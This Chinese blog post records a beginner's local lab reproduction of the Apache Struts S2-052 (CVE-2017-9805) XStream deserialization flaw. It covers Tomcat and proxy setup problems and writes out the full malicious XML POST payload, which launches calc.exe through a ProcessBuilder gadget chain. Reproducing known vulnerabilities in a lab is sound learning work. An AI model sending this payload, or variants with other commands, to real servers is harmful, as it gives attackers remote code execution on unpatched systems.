某S2-052漏洞repetition的一些小白易卡点

最新推荐文章于 2021-07-31 22:48:10 发布
最新推荐文章于 2021-07-31 22:48:10 发布
阅读量327 收藏
点赞数
分类专栏: 漏洞 文章标签: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jianghu_xia/article/details/77930571
版权

漏洞描述:

CVE-2017-9805

2017年9月5日,Apache Struts官方发布最新的安全公告称,Apache Struts 2.5.x的REST插件存在远程代码执行高危漏洞,漏洞编号为CVE-2017-9805(S2-052),受影响的版本为Struts 2.5 - Struts 2.5.12。

原理:攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行严格的过滤导致远程代码执行。

环境搭建:win10系统struts2-rest-showcase.war、struts2-showcase.war、apache-tomcat

由于是为数不多的几次复现,小白一枚,途中遇到较多的问题,希望自己能记住。

首先遇到的第一个问题,会跳出一个框框“指定服务未安装”大概就是这个吧!

解法:原来是没有安装此项服务。具体安装方法:打开命令行提示符窗口
=> 进入Tomcat安装目录==> 进入bin目录下==> 输入:service.bat install 即可

成功运行如下图所示:


随后继续操作又发现一个问题:


因为用的是火狐,本地127.0.0.1抓不到包,最后发现火狐代理里面有个localhost和127.0.0.1不使用代理的默认设置。

 

把不使用代理中的内容给删除了就好了



然后继续操作,发现第三个很重要的问题:一定要熟悉http,什么请求啊等等等。

就比如下面的两张图:




就遇到这三个小问题然后其他按着操作就好了

关键折尺

修改两个地方,一是Content-Type: application/xml

二是post数据内容为:

<map>
<entry>
<jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class=”com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data”> <dataHandler> <dataSource class=”com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource”> <is class=”javax.crypto.CipherInputStream”> <cipher class=”javax.crypto.NullCipher”> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class=”javax.imageio.spi.FilterIterator”> <iter class=”javax.imageio.spi.FilterIterator”> <iter class=”java.util.Collections$EmptyIterator”/> <next class=”java.lang.ProcessBuilder”> <command> <string>calc.exe</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class=”javax.imageio.ImageIO$ContainsFilter”> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class=”string”>foo</next> </serviceIterator> <lock/> </cipher> <input class=”java.lang.ProcessBuilder$NullInputStream”/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference=”../jdk.nashorn.internal.objects.NativeString”/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference=”../../entry/jdk.nashorn.internal.objects.NativeString”/>
</entry>
</map>

放一张最后得到的截图



至于其他,得到计算器还没研究出来,继续探索!


jianghu_xia
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
“易班”学生管理平台小项目 万字总结 泪目!!!
IRON__MAN__的博客
08-13 1902
"易班"——项目总结1. 项目概述2.项目背景3. 项目应用到的技术1.Maven项目功能项目中遇到的难点展望链接以及开源代码 1. 项目概述 "易班"项目是基于Java语言的一个Web项目,是一个学生和班级信息管理平台,它可以对学生或者班级信息进行增加,删除,改正,查询的一个信息平台,通过网页访问管理人员可以了解到实时的学生信息和班级信息,最直接的适用场景是适用于各个学校,对字段进行修改后也可以适用于公司,组织等等一切需要对人力资源信息进行管理的场景下,因此这个项目具有相当的实用性和必要性。 2.项目背景
struts2-052漏洞学习
qq_44312507的博客
12-17 732
struts2-052漏洞学习文档 一、了解漏洞 1.struts2是什么? Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其...
浅谈struts2漏洞(检测工具及S2-052漏洞漏洞平台的搭建复现)
Ping_Pig的博客
09-28 4982
简介: struts2是apache项目下的一个web框架,主要应用于各类门户网站,而相对应的漏洞则是从2007年7月23日发布的第一个Struts2漏洞S2-001到2018年的S2-057,跨度还是很多的,以前学习的时候也是听说,基本上Struts每发布一个版本都会存在漏洞,根据Freebuf上的文章显示,漏洞的类型基本上是RCE,XSS,CSRF,DOS,目录遍历和其他功能缺陷漏洞等。风靡...
Struts2 S2-052漏洞分析
热门推荐
Exploit的小站~
05-10 1万+
0x00 调试环境搭建 使用官方的rest-sample即可,下载2.5.12版本的源码https://github.com/apache/struts/archive/STRUTS_2_5_12.zip,然后将apps下面的rest-showcase源码脱下来。 Eclipse中新建一个maven工程,web.xml,pom.xml和struts.xml如下: pom.xml &...
S2-052 远程代码执行漏洞检查利用
a1b2c3是弱口令
12-11 9193
2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,...
Python学习
洛柒尘的博客
10-07 7690
前言 为了巩固xss漏洞的知识点,所以就刷xss挑战。期间自然有卡住的时候,而遇到难题卡住加上思考就是最好的学习方式,当快出来的时候,突然舍友突然微信叫我易班签到,我心态都炸了,整个思路都乱了,签完到发现到那一步了都不知道,所以像我这种健康的学生就想着有没有一个可以自动签到的软件呢。找了半天发现没有,但找到了一篇文章,是looyeagee大佬写的。因为都是接触的是web方面的,但主要是pc端的,对安卓不是很了解,看到大佬文章出现的链接突然反应过来,都是http协议,那不都效果一样吗?就着手准备进行学习一波,
obsidian-spaced-repetition:通过在Obsidian.md上使用间隔重复来检查音符来消除遗忘曲线和音符老化
04-12
现在,在文件库中的.obsidian/plugins下创建一个以obsidian-spaced-repetition文件夹。 将styles.css的main.js , manifest.json和styles.css文件添加到该文件夹​​中。用法新笔记所有“新”的笔记中列出New右窗格...
程序员考试刷题-Coding-Repetition:C#
07-07
程序员考试刷题从哪里开始 在学习本课程之前,建议先学习命令行和版本控制课程: . 这为您提供了学习如何创建自己的 Git 存储库以及如何使用它的工具。 本课程的教材是。 在尝试做练习之前一定要阅读材料。...
child-spaced-repetition-react:我的 web 应用程序 child-spaced-repetition 在前端实现了React
07-03
通过单点登录,一个用户将能够创建多个子用户(学生)。 每个学生都可以像拥有自己的帐户一样行事。 这样,一个监护人就可以为每个孩子设置多个“帐户”,而无需多个电子邮件和密码。 甲板 套牌将由要记忆的卡片组成...
js-study-repetition-structure:使用JavaScript研究重复结构
04-13
js学习重复结构使用JavaScript研究重复结构概括: 在这个项目中,可以使用重复结构来训练一些逻辑。 下面的图像是一个示例,我们可以使用这些结构进行一些逻辑操作; 培训的好方法,:) :rocket:为了尽管
alohamatlab代码-Constant-and-Irregular-Repetition-Slotted-Aloha:具有恒定和不规则重
05-20
在Constant-and-Irregular-Repetition-Slotted-Aloha-master这个项目中,包含了实现这一协议的源代码,包括用户节点生成、信道模型设定、冲突检测、重传策略以及性能评估等多个模块。 在系统开源的背景下,这些代码...
S2-052复现过程(附POC利用)
dfdhxb995397的博客
09-06 487
漏洞编号:CVE-2017-9805(S2-052) 影响版本:Struts 2.5 - Struts 2.5.12 漏洞概述:问题出现在struts2-rest-plugin插件XStreamHandler处理器中的toObject()方法,其中未对传入的值进行任何限制,在使用XStream反 0×01 搭建环境 直接部署struts-2.5.12-all中的struts...
Struts2 S2-052
卧龙居
10-25 2617
Struts2 S2-052影响的版本是Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12。 主要是struts2的rest plugin的XStreamHandler存在问题。 所以,我们在复现此漏洞时,需要引入struts2-core,struts2-rest-plugin以及struts2-convention-plu
CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
lihuixin99的博客
09-08 702
一. 漏洞概述 2017年9月5日,Apache Struts 2官方发布一个严重级别的安全漏洞公告,该漏洞由国外安全研究组织lgtm.com的安全研究人员发现,漏洞编号为CVE-2017-9805(S2-052),在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险。二. 漏洞基本信息 漏洞编号: CVE-2017-9805 漏洞名称...
堵住日常操作易泄密的20个漏洞(转)
cuankuangzhong6373的博客
05-23 477
进入Windows 9X/2000中的一切操作,无论是工作、学习或娱乐,自进入Windows系统开始,都将被Windows以及它所有的服务(程序)记录在案,并保存在硬盘中,此项“功能”原本是系统设计者为了方便用户而设置的,但会...
易班显示服务器错误,易班常见问题汇总
weixin_32708653的博客
07-31 2631
Q1:为什么我退出的之后在线时间没有增加?A1:是否注意到网页右上方有一个退出的按钮(如图)只有点此退出才会计算在线时间,而且不同的在线时间也会得到不同的网薪和经验奖励哟!Q2:怎么才有VIP?A2:有些同学总说VIP的就是版主,这个观念是错误的。谁都有可能得到VIP,主社区会有各种赠送VIP的活动,只要你仔细去各个板块查看,并积极参加,我想,得到VIP并不难。还有如果你连续签到七天,也有一定机会...
S2-052】Struts2远程命令执行漏洞(CVE-2017-9805)
Unitue_逆流
10-13 5961
**操作机:**Windows 7**目标IP:**172.16.11.2:8080实验工具: Burp Suite:是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架,本次试验主要用到它的抓包改包功能。 Metasploit:一款
Struts2远程代码执行漏洞CVE-2017-9805 s2-052 绿盟科技发布扫描工具
weixin_33979745的博客
09-01 461
5日晚,apache官方发布公告称,Struts2出现严重远程代码执行漏洞。发布通告不到一天,又更新了受影响版本的范围,增加了Struts 2.12 - Struts 2.3.33 ,此外还有Struts 2.5 - Struts 2.5.12。请尽快升级到 Struts 2.5.13,官方通告中称 Struts2在使用带有 XStream 处理...
[课题设计]SSM框架开发个人通讯录+jsp+Java前后端分离带论文和源码.zip
最新发布
07-20
本项目是一个基于SSM框架开发的个人通讯录应用,采用JSP作为前端技术,实现了前后端分离。项目针对计算机相关专业的学生以及需要进行项目实战练习的Java学习者,提供了完整的源码、数据库脚本和开发说明,同时附带论文参考,可作为毕业设计或课程设计的优质资源。 在功能方面,该项目实现了基本的通讯录增删改查功能,用户可以通过前端界面录入、修改和查询联系人信息,后台则通过SSM框架进行数据处理和业务逻辑的实现。此外,项目还支持分页显示功能,提高了用户体验。 技术层面,项目采用了成熟的SSM框架进行开发,确保了代码的结构清晰、易于维护。数据库选用MySQL,稳定可靠,且易于扩展。开发环境包括JDK、IDEA和Tomcat,配置简单,便于上手。 经过严格的调试,项目已确保可稳定运行。对于有一定基础的Java学习者,还可以在此基础上进行功能拓展,进一步提升实战能力。
查询报错 Got error 'repetition-operator operand invalid' from regexp
06-10
这个错误通常是由于正则表达式中使用了不合法的重复操作符导致的。在MySQL的正则表达式中,常用的重复操作符包括*、+和?等,它们用于匹配前面的字符重复出现的次数。但是,如果使用不当,就会出现这个错误。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值